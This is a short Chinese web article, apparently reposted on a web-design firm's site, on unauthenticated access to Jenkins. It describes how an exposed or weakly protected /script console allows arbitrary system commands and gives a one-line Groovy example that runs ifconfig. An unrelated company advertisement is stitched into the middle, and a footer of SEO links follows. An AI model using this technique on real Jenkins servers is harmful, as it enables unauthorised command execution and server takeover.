jenkins未授权访问-任意命令执行

jenkins 未授权访问-任意命令执行

0x00 jenkins简介

enkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。

独山网站制作公司哪家好,找成都创新互联!从网页设计、网站建设、微信开发、APP开发、响应式网站建设等网站项目制作,到程序开发,运营维护。成都创新互联公司2013年成立到现在10年的时间,我们拥有了丰富的建站经验和运维经验,来保证我们的工作的顺利进行。专注于网站建设就选成都创新互联

0x01 漏洞原因

jenkins 未设置帐号密码,或者使用了弱帐号密码

0x02 漏洞复现

在默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,×××者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。
任意命令执行界面:
http://ip:port/script

println "ifconfig".execute().text

jenkins 未授权访问-任意命令执行


网站标题:jenkins未授权访问-任意命令执行
当前链接:http://csruizhi.cn/article/jidcso.html

其他资讯

Copyright © 2007-2024 成都优众联杰科技有限公司 All Rights Reserved 蜀ICP备2024116266号
友情链接: 成都网站制作 盐亭网站设计 重庆企业网站建设 专业网站设计 重庆网站建设 手机网站建设 专业网站设计 古蔺网站建设 成都企业网站制作 网站设计 外贸营销网站建设 成都商城网站制作 企业网站制作 成都响应式网站建设 定制网站设计 企业网站设计 高端网站设计推广 手机网站制作设计 高端品牌网站建设 成都网站建设 网站建设公司 广安网站设计